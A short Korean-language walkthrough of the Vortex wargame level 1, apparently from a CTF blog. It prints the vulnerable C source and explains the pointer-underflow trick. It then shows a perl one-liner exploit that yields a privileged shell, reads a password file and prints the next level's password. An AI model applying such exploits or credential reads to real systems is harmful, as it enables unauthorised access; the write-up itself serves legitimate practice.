(vortex) Level1 -> Level2

Canary Values

We are looking for a specific value in ptr. You may need to consider how bash handles EOF..

[source]

#include <stdlib.h>

#include <unistd.h>

#include <string.h>

#include <stdio.h>

#define e(); if(((unsigned int)ptr & 0xff000000)==0xca000000) { setresuid(geteuid(), geteuid(), geteuid()); execlp("/bin/sh", "sh", "-i", NULL); }

void print(unsigned char *buf, int len)

{

        int i;

        printf("[ ");

        for(i=0; i < len; i++) printf("%x ", buf[i]); 

        printf(" ]\n");

}

int main()

{

        unsigned char buf[512];

        unsigned char *ptr = buf + (sizeof(buf)/2);

        unsigned int x;

        while((x = getchar()) != EOF) {

                switch(x) {

                        case '\n': print(buf, sizeof(buf)); continue; break;

                        case '\\': ptr--; break; 

                        default: e(); if(ptr > buf + sizeof(buf)) continue; ptr++[0] = x; break;

                }

        }

        printf("All done\n");

}

볼텍스 푸는데 서버가 참 .. 말로 표현할수 없을만큼 빠르다

포인터가 buf[256]을 가르키고있다.

switch의 case '\\' 를 사용하게 되면 ptr-- 되므로 

ptr 이 0xca000000을 가리키게 하기위해 \\을 261번 넣어주었다 

[attack]

vortex1@melinda:/vortex$ (perl -e 'print "\\"x261,"\xca\x00"';cat)|./vortex1

id

uid=5002(vortex2) gid=5001(vortex1) groups=5002(vortex2),5001(vortex1)

cat /etc/vortex_pass/vortex2

23anbT\rE